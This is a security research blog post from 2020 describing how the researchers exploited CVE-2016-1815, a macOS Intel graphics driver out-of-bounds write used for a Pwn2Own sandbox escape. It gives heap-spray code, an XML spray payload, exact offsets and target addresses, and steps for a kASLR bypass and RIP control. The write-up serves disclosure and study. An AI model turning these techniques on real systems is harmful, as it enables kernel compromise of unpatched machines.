Pwning the Whole Kernel with One Rectangle, Part 1: Dance of the Zones

Posted by tetley at 2020-03-24

Can a single rectangle pwn the whole kernel? It sounds like a fantasy, but it really happened at Pwn2Own in Vancouver in March this year. This series of articles shares our experience discovering and exploiting Blitzard (CVE-2016-1815), which we used for the sandbox escape. In this article we start with the second and third steps: the dance of kalloc.48 and the blunt heavy sword of kalloc.8192. In the last article we will return to the origin and explain the cause of the vulnerability.

Takeaway

We start from an out-of-bounds (OOB) write on a vector and, through careful heap layout, turn it into a write primitive with an arbitrary address but a restricted value. We then use this primitive to build an infoleak that bypasses kASLR, and finally control RIP.

The IGVector::add function

    char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
    {
      v3 = /* elided */;
      if ( this->currentSize != this->capacity )
        goto LABEL_4;
      LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
      if ( v4 )
      {
    LABEL_4:
        this->currentSize += 1;
        v5 = /* elided */;
        *(this->storage + 32 * this->currentSize + 24) = a2->field_18; // rect2.len, height
        *(this->storage + 32 * this->currentSize + 16) = a2->field_10; // rect2.y, x
        *(this->storage + 32 * this->currentSize + 8) = a2->field_8;   // rect1.len, height
        *(this->storage + 32 * this->currentSize) = a2->field_0;       // rect1.y, x
      }
      return v4;
    }

IGVector is a generic template class used heavily in Apple's graphics drivers. Its first field is currentSize, followed by capacity, which records the maximum capacity of the vector. After that comes the storage pointer, which holds the heap address of the vector's backing store. rect_pair_t is a pair of rectangles, and each rectangle uniquely identifies a drawing area on the screen. Its fields are as follows:

x and y are the coordinates of a corner of the rectangle, while w and h are its width and height. Together these four values uniquely determine a rectangle in the coordinate system. The rectangles start out as integers, but after a series of scaling and splitting operations they are converted to IEEE 754 floating-point numbers. These floating-point operations make the driver harder to reverse, because IDA's F5 (Hex-Rays) plugin does not recognize and organize SSE floating-point instructions well. They also restrict the values that our OOB write can control.
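To make the description concrete, here is a minimal C sketch of the two layouts. It is our own reconstruction from the text and the decompiled offsets, not the driver's real declaration: the order of the float fields inside a rectangle and the 8-byte width of currentSize and capacity are assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One rectangle after conversion to floats (field order is an assumption). */
typedef struct {
    float y, x;   /* corner coordinates */
    float w, h;   /* width ("len") and height */
} rect_t;

/* The 32-byte element that add() copies with four 8-byte stores. */
typedef struct {
    rect_t rect1; /* field_0 and field_8 in the decompilation */
    rect_t rect2; /* field_10 and field_18 in the decompilation */
} rect_pair_t;

/* Vector header as described in the text (8-byte fields are an assumption). */
typedef struct {
    uint64_t     currentSize;
    uint64_t     capacity;
    rect_pair_t *storage;
} IGVector;

static_assert(sizeof(rect_pair_t) == 32, "add() indexes storage in 32-byte strides");
static_assert(offsetof(rect_pair_t, rect2) == 0x10, "rect2 starts at field_10");
static_assert(offsetof(IGVector, capacity) == 8, "capacity follows currentSize");
```

With this layout, the 8 bytes at offset 0x8 of the header are the capacity field, which matters later when we look for a spray object whose bytes at that offset are controllable.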

When the OOB occurs, the memory layout is as shown in the following figure. The IGVector::add call operates on a 48-byte IGVector that lies partially out of bounds. Its size field is pinned to 0xdeadbeefdeadbeef: because kalloc.48 elements are smaller than a cache line, the zone allocator always poisons them after free. Fortunately, capacity and storage are two things we can control. If the following conditions are met, we get an arbitrary address write across the whole address space.
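Reading the decompiled add function earlier in this article literally, one plausible form of that condition can be sketched in C. This is an assumption on our part: it supposes that the write lands at storage + 32 * (currentSize + 1) with 64-bit wraparound, and that grow is skipped whenever capacity differs from the poisoned currentSize. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define POISON_SIZE 0xdeadbeefdeadbeefULL /* currentSize left by zone poisoning */
#define ELEM_SIZE   32ULL                 /* stride used by add() */

/* Address add() would write to, assuming currentSize is incremented first. */
static uint64_t oob_write_address(uint64_t storage) {
    return storage + ELEM_SIZE * (POISON_SIZE + 1); /* wraps modulo 2^64 */
}

/* Fake storage pointer to plant so that the write lands on `target`. */
static uint64_t storage_for_target(uint64_t target) {
    uint64_t storage = target - ELEM_SIZE * (POISON_SIZE + 1);
    assert(oob_write_address(storage) == target); /* round-trip sanity check */
    return storage;
}

/* grow() is only bypassed when capacity is not equal to currentSize. */
static int capacity_skips_grow(uint64_t capacity) {
    return capacity != POISON_SIZE;
}
```

For example, storage_for_target(T) gives the value to place in the controlled storage field for a desired target T, and any capacity other than 0xdeadbeefdeadbeef keeps add() on the direct write path.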


But this is still not a primitive that writes arbitrary values. As mentioned earlier, the rectangle fields start out as signed int16 values, that is, in the range [-0x8000, 0x7fff]. By the time the function that triggers the OOB is called, they have already been converted to IEEE 754 floating-point numbers. This means that each trigger writes two consecutive 4-byte values, four times over, with every value confined to the ranges 0x3xxxxxxx, 0x4xxxxxxx, 0xcxxxxxxx, 0xdxxxxxxx or the constant 0xbf800000 (the floating-point representation of -1), for a total of 32 bytes written.
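The value restriction is easy to reproduce in user space. The following C sketch only models the plain int16-to-float conversion, not the driver's scaling and splitting steps, and the helper names are ours:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

static_assert(sizeof(float) == sizeof(uint32_t), "expects 32-bit IEEE 754 floats");

/* Raw 32-bit pattern of a float, i.e. the bytes that would reach memory. */
static uint32_t float_bits(float f) {
    uint32_t bits;
    memcpy(&bits, &f, sizeof bits);
    return bits;
}

/* Bit pattern produced when an int16 rectangle field is converted to float. */
static uint32_t coord_bits(int16_t v) {
    return float_bits((float)v);
}
```

coord_bits(-1) is 0xbf800000, the constant mentioned above. Positive inputs from 1 to 0x7fff map to 0x3f800000 through 0x46fffe00, and negative inputs from -1 to -0x8000 map to 0xbf800000 through 0xc7000000, which is why the high nibble of every written dword is so constrained.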

This does not look like good news. We first need a way to make this awkward write reliable, and then we will show how to use it to complete the exploit.

Controlling the kalloc.48 zone

As shown in the above figure, we need to precisely control the memory content at the moment the overflow occurs, otherwise a bad access will crash the kernel. Unfortunately, kalloc.48 happens to be a fairly busy zone in the kernel, and IOMachPort is its most active user. The contents of an IOMachPort are obviously not controllable, so we need to avoid its interference.

Historically, the common heap layout techniques have been io_open_service_extended and ool_msg. Each has its own advantages and disadvantages:
– ool_msg has little side effect on the heap, but the first 0x18 bytes of its header are not controllable, and our vulnerability requires precise control of the 8 bytes at offset 0x8
– io_open_service_extended causes huge side effects in kalloc.48, because every spray allocates a new IOMachPort

Here we found and used a new heap spray method: IOCatalogueSendData, shown in the code snippet below. It needs only a master port to spray the heap and has few side effects: energy-saving and eco-friendly.

    kern_return_t
    IOCatalogueSendData(
            mach_port_t     _masterPort,
            uint32_t        flag,
            const char     *buffer,
            uint32_t        size )
    {
        //...
        kr = io_catalog_send_data( masterPort, flag,
                                (char *) buffer, size, &result );
        //...
        if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
            mach_port_deallocate(mach_task_self(), masterPort);
        //...
    }

    /* Routine io_catalog_send_data */
    kern_return_t is_io_catalog_send_data(
            mach_port_t             master_port,
            uint32_t                flag,
            io_buf_ptr_t            inData,
            mach_msg_type_number_t  inDataCount,
            kern_return_t *         result)
    {
        //...
        if (inData) {
            //...
            kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
            data = CAST_DOWN(vm_offset_t, map_data);
            // must return success after vm_map_copyout() succeeds
            if( inDataCount ) {
                obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
                //...
        switch ( flag ) {
            //...
            case kIOCatalogAddDrivers:
            case kIOCatalogAddDriversNoMatch: {
                //...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array ,
                                          flag == kIOCatalogAddDrivers) ) {
                        //...
                }
                break;
            //...
    }

    bool IOCatalogue::addDrivers(
        OSArray * drivers,
        bool doNubMatching)
    {
        //...
        while ( (object = iter->getNextObject()) ) {
            // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL
            OSDictionary * personality = OSDynamicCast(OSDictionary, object);
            //...
            // Add driver personality to catalogue.
            OSArray * array = arrayForPersonality(personality);
            if (!array) addPersonality(personality);
            else
            {
                count = array->getCount();
                while (count--) {
                    OSDictionary * driver;
                    // Be sure not to double up on personalities.
                    driver = (OSDictionary *)array->getObject(count);
                    //...
                    if (personality->isEqualTo(driver)) {
                        break;
                    }
                }
                if (count >= 0) {
                    // its a dup
                    continue;
                }
                result = array->setObject(personality);
                //...
                set->setObject(personality);
            }
            //...
    }

The addDrivers function takes an OSArray as input, which must satisfy the following conditions:
– the OSArray contains an OSDict
– the OSDict contains the key IOProviderClass
– the OSDict must not be identical to an OSDict that already exists in the catalogue

We can prepare our layout payload in the following XML format and send it with IOCatalogueSendData(masterPort, 2, buf, 4096), as many times as needed.

    <array>
      <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
          <string>AAAAAAAAAAAAAAAAAAAAAA</string>
          <string>AAAAAAAAAAAAAAAAAAAAAB</string>
          ...
          <string>ZZZZZZZZZZZZZZZZZZZZZZ</string>
        </array>
      </dict>
    </array>
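A payload of this shape can be generated rather than written by hand. The C sketch below is one possible way to do it, not the code we used in the exploit: build_spray_payload, spray_string and append are hypothetical helpers, and the 22-character string length is an assumption taken from the sample above. Varying `first` between calls keeps each dictionary different from the ones already in the catalogue.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SPRAY_STR_LEN 22 /* assumed length of each <string> body */

/* Write the n-th spray string: a fixed-width base-26 counter over 'A'..'Z'. */
static void spray_string(unsigned n, char out[SPRAY_STR_LEN + 1]) {
    memset(out, 'A', SPRAY_STR_LEN);
    out[SPRAY_STR_LEN] = '\0';
    for (int i = SPRAY_STR_LEN - 1; i >= 0 && n > 0; i--) {
        out[i] = (char)('A' + n % 26);
        n /= 26;
    }
}

/* Append formatted text at *off; returns 0 if it would not fit in cap bytes. */
static int append(char *buf, size_t cap, size_t *off, const char *fmt, const char *arg) {
    int n = snprintf(buf + *off, cap - *off, fmt, arg);
    if (n < 0 || (size_t)n >= cap - *off)
        return 0;
    *off += (size_t)n;
    return 1;
}

/* Build one XML payload with `count` strings; returns its length, or 0 on overflow. */
static size_t build_spray_payload(char *buf, size_t cap, const char *tag,
                                  unsigned first, unsigned count) {
    size_t off = 0;
    assert(buf != NULL && tag != NULL && cap > 0);
    if (!append(buf, cap, &off,
                "<array><dict><key>IOProviderClass</key><string>%s</string>", tag) ||
        !append(buf, cap, &off, "<key>%s</key><array>", tag))
        return 0;
    for (unsigned i = 0; i < count; i++) {
        char s[SPRAY_STR_LEN + 1];
        spray_string(first + i, s);
        if (!append(buf, cap, &off, "<string>%s</string>", s))
            return 0;
    }
    if (!append(buf, cap, &off, "%s", "</array></dict></array>"))
        return 0;
    return off;
}
```

A caller would fill a 4096-byte buffer with build_spray_payload(buf, 4096, "ZZZZ", first, count) and pass that buffer to IOCatalogueSendData as described above.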

With this method, our recipe for kalloc.48 is:
– spray a combination of vm_map_copy and 50 IOCatalogueSendData (whose content is fully controllable), with size 0x30
– free 1/3 to 2/3 of the ool_msgs to dig holes in the heap
– trigger the vulnerability and let the vulnerable vector fall into one of the holes

Because we dig enough holes, the heap layout tends to be stable and matches our expectations with high probability. This gives us a stable, repeatable arbitrary address write and completes the first of the three steps.

What comes next?

Controlling RIP with a float

Once we have a stable write, how do we control RIP? A naive idea is to overwrite the vtable pointer of a userclient directly. However, the restricted range of values the vulnerability can write makes this infeasible, as shown in the following figure. Note that an address beginning with 0xbf is not a valid kernel address.

However, thanks to the MOV instruction on x86, strict 8-byte alignment is not required. We can in fact perform the write at a 4-byte-aligned address, as shown in the following figure:

That looks promising, but it is not so simple. Among the many userclients, only RootDomainUserClient has a vtable pointer whose upper four bytes are 0xffffff80; the vtable pointers of all other userclients have upper bytes 0xffffff7f. Given how kASLR works, the kernel heap can hardly occupy that region. So is it feasible to overwrite RootDomainUserClient?

Why is the spray so slow?

Because RootDomainUserClient is relatively small, we need to spray a large number of them to get a reasonable probability that one lands at a predicted address. In practice, we found that the spray speed dropped quadratically as the number of userclients grew. We looked into the relevant code, shown below:

    bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
                                    const IORegistryPlane * plane )
    {
        OSArray *   links;
        bool        ret;
        bool        needParent;
        //...
        ret = makeLink( parent, kParentSetIndex, plane );

        if( (links = parent->getChildSetReference( plane )))
            needParent = (false == arrayMember( links, this ));
        else
            needParent = true;
        //...
        if( needParent)
            ret &= parent->attachToChild( this, plane );

        return( ret );
    }

We can see that arrayMember does a linear search over the clients already attached. Since every new client triggers such a search, opening n clients costs O(n^2) in total.
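The quadratic growth is easy to confirm with a toy model. The C sketch below is not kernel code; it only counts how many comparisons a linear membership scan performs when n children are attached one after another, under the assumption that each scan walks the whole list because the new child is never found.

```c
#include <assert.h>

/* Count comparisons when n children attach one by one, each after a linear scan. */
static unsigned long long linear_scan_attach_cost(unsigned n) {
    unsigned long long comparisons = 0;
    for (unsigned attached = 0; attached < n; attached++) {
        /* arrayMember-style scan: the new child is absent, so every
           already attached entry is compared once. */
        for (unsigned j = 0; j < attached; j++)
            comparisons++;
    }
    /* The loop total must match the closed form n * (n - 1) / 2. */
    assert(comparisons == (n == 0 ? 0ULL : (unsigned long long)n * (n - 1) / 2));
    return comparisons;
}
```

Doubling the number of clients from 1000 to 2000 raises the count from 499500 to 1999000, roughly a factor of four, which matches the slowdown we observed while spraying.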


The code that follows makes things worse. Before a userclient can be opened, it has to attach to its parent, which calls parent->attachToChild:

    bool IORegistryEntry::attachToChild( IORegistryEntry * child,
                                            const IORegistryPlane * plane )
    {
        OSArray *   links;
        //...

        ret = makeLink( child, kChildSetIndex, plane );

then

    bool IORegistryEntry::makeLink( IORegistryEntry * to,
                                    unsigned int relation,
                                    const IORegistryPlane * plane ) const
    {
        OSArray *   links;
        bool        result = false;
        //...
            result = arrayMember( links, to );
            if( !result)
                result = links->setObject( to );

        } else {

Here links is an OSArray, and setObject inserts the new userclient into the array's storage, which in turn calls a time-consuming function:

    unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
    {
        //...
        newArray = (const OSMetaClassBase **) kalloc_container(newSize);
        if (newArray) {
            oldSize = sizeof(const OSMetaClassBase *) * capacity;

            OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));

            bcopy(array, newArray, oldSize);
            bzero(&newArray[capacity], newSize - oldSize);
            kfree(array, oldSize);
            array = newArray;

So the conclusion from this round is that spraying userclients has O(n^2) time complexity. This forces us to choose a large userclient for the heap spray: this year's competition machine, the MacBook, uses a Core processor with negligible performance, and the exploit would run slower than a snail if we stayed hung up on RootDomainUserClient.


IGAccelVideoContext to the rescue

We continued to search for usable userclients based on the following conditions:
– it must be possible to open and call it from the sandbox
– its size must be greater than the page size, the larger the better

IGAccelVideoContext, which occupies two pages, is exactly the savior we are looking for. Essentially every IOAcceleratorFamily2 userclient has a service pointer to IntelAccelerator. For IGAccelVideoContext, it is at offset 0x528. We can overwrite the lower 4 bytes of this pointer so that it points to heap content under our control, and then trigger a virtual call through it.
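The partial overwrite of the service pointer can be simulated in user space. This C sketch assumes a little-endian machine and assumes that each OOB store covers two consecutive 4-byte float patterns, so starting the store 4 bytes before the pointer replaces only its low dword. The function names and the 0x1000-byte stand-in object are ours.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OBJ_SIZE    0x1000 /* stand-in object, large enough to hold the field */
#define SERVICE_OFF 0x528  /* offset of the service pointer, from the text */

/* Simulate one 8-byte OOB store (two 4-byte float patterns) at obj + off. */
static void oob_store(uint8_t *obj, size_t off, uint32_t first, uint32_t second) {
    assert(off + 8 <= OBJ_SIZE);
    memcpy(obj + off, &first, 4);
    memcpy(obj + off + 4, &second, 4);
}

/* Start the store 4 bytes early so only the pointer's low dword changes. */
static uint64_t clobber_low_dword(uint64_t original_ptr, uint32_t first, uint32_t second) {
    uint8_t obj[OBJ_SIZE] = {0};
    uint64_t result;
    memcpy(obj + SERVICE_OFF, &original_ptr, 8);
    oob_store(obj, SERVICE_OFF - 4, first, second);
    memcpy(&result, obj + SERVICE_OFF, 8);
    return result;
}
```

With a pointer of 0xffffff80deadbeef and a second float of -1 (0xbf800000), the result is 0xffffff80bf800000: the upper half survives and the lower half becomes a value we can write. The price is that the 4 bytes just before the pointer are clobbered by the first float.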

RIP control

Although there are virtual function calls here, we cannot call a virtual function on service directly, because the header of the vm_map_copy used for the layout is not controllable, as mentioned above. Instead, the context_finish interface indirectly calls a virtual function on service->mEventMachine, which is exactly what we need.

    __int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
    {
      int v1;
      unsigned int v2;

      v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
             this->service->mEventMachine,

Now we change direction and overwrite the service field of an arbitrary IGAccelVideoContext. Since we do not know the exact heap address, we have to keep spraying. The steps are as follows:
– spray 0x50000 ool_msgs, pushing the heap up to 0xffffff80 bf800000 (address B)
– free the ones in the middle and spray IGAccelVideoContext, making sure that address A in the middle, 0xffffff80 62388000, is occupied by one of them
– trigger the vulnerability, writing at A - 4 + 0x528 so that the service pointer becomes 0xffffff80 bf800000 (address B)
– call an external method on each of the sprayed userclients to detect the corruption

Why do we choose A and B, which look like magic numbers? As mentioned earlier, we can only write floats in specific ranges. For example, we can turn 0xffffff80 deadbeef into 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx or 0xffffff80 bf800000. But most of these addresses are either too low (kslide changes on every boot, and a large slide pushes the heap base up to 0xffffff80 4xxxxxxx) or too high (not enough memory, and too slow to spray). So in the end we choose to write 0xbf800000, with A at roughly half of that.

The code is as follows:

    mach_msg_size_t size = 0x2000;
    mach_port_name_t my_port[0x500];
    memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
    char *buf = malloc(size);
    memset(buf, 0x41, size);
    // plant A - 0xd0 + 2 at two offsets, 0x1000 apart
    *(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
    *(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;
    // spray 0x500 messages of 0x2000 bytes each
    for (int i = 0; i < 0x500; i++) {
        *(unsigned int *)buf = i;
        printf("number %x success with %x.\n", i, send_msg(buf, size, &my_port[i]));
    }
    // release the messages in the middle
    for (int i = 0x130; i < 0x250; i++) {
        read_kern_data(my_port[i]);
    }
    printf("press enter to fill in IOSurface2.\n");
    // fill the freed space with userclients
    io_service_t serv = open_service("IOAccelerator");
    io_connect_t *deviceConn2;
    deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
    kern_return_t kernResult;
    for (int i = 0; i < 0x12000; i++) {
        kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
        printf("%x with result %x.\n", i, kernResult);
    }

The picture below makes this clearer.

So is that the end? Not yet.

Head or middle?

Sharp readers may already have a question: you spray objects of size 0x2000, so how can you guarantee that A lands exactly at the head of a sprayed userclient? It might land in the middle.

Yes, it might. To handle the case where A falls in the middle, we need to write at both A - 4 + 0x528 and A - 4 + 0x528 + 0x1000 so that both cases are covered.

Bypassing kASLR

What about kASLR? We now know that address A is occupied by an IGAccelVideoContext and address B is occupied by a vm_map_copy. Now that the service pointer points to a fake layout under our control, is there an interface in a userclient that returns the content of some address? Searching turned up get_hw_steppings:


    __int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
    {
      __int64 service;

      service = a1->service;
      *a2 = *(_DWORD *)(service + 0x1140);
      a2[1] = *(_DWORD *)(service + 0x1144);
      a2[2] = *(_DWORD *)(service + 0x1148);
      a2[3] = *(_DWORD *)(service + 0x114C);
      a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
      return 0LL;
    }

Pay attention to this line:



    a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

Recall that service + 0x1288 is under our control, so this is a perfect primitive for reading from an arbitrary address. We take the following steps:
– fill B with vm_map_copy
– trigger the vulnerability and overwrite the service pointer with B, so that it points to a vm_map_copy filled with 0x41 bytes (except for offset 0x1288, which is set to A - 0xd0)
– call get_hw_steppings and look for 0x41414141 in the result; if it is returned, this userclient has been modified by us
– a2[4] returns one byte at address A; repeat the steps above to read the whole content
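The read primitive can be modeled in user space. In this C sketch, steppings_byte is a stand-in for the last assignment in get_hw_steppings, and leak_bytes re-aims a fake service buffer once per byte. It is an illustration under our own assumptions: in the real attack each re-aim means repeating the spray, and the names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FAKE_SERVICE_SIZE 0x2000
#define PTR_OFF           0x1288 /* qword dereferenced by get_hw_steppings */
#define BYTE_OFF          0xD0   /* offset added before the final byte load */

static_assert(PTR_OFF + sizeof(uintptr_t) <= FAKE_SERVICE_SIZE,
              "the planted pointer must fit inside the fake service");

/* User-space stand-in for the a2[4] assignment in get_hw_steppings. */
static uint8_t steppings_byte(const uint8_t *service) {
    uintptr_t p;
    memcpy(&p, service + PTR_OFF, sizeof p);
    return *(const uint8_t *)(p + BYTE_OFF);
}

/* Leak len bytes from target by re-aiming the fake service once per byte. */
static void leak_bytes(uint8_t *fake_service, const void *target,
                       uint8_t *out, size_t len) {
    for (size_t i = 0; i < len; i++) {
        /* Plant (address - 0xd0) so that the +0xd0 load hits the address. */
        uintptr_t aimed = (uintptr_t)target + i - BYTE_OFF;
        memcpy(fake_service + PTR_OFF, &aimed, sizeof aimed);
        out[i] = steppings_byte(fake_service);
    }
}
```

The rest of the fake service stays filled with 0x41, which is what lets the first four returned dwords act as a marker for a corrupted userclient.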

The picture below makes this easier to understand.

Head or middle

Sharp readers will realize that B may also fall in the middle of a vm_map_copy, just like A. We solve the B problem the same way as above: we write A - 0xd0 at both 0x1288 and 0x288. If we end up reading offset 0x1000 of a normal IGAccelVideoContext, the value there is 0 by its nature.


This means we can tell the head from the middle using this property, with at most two attempts, as shown in the figure below. In the end we obtain an arbitrary address leak.


The video of this attack can be found at

So what exactly is this magical bug that is so complicated to exploit? And what does the vulnerability itself look like? Stay tuned for the following articles. If you can't wait, please see our slides from Black Hat USA.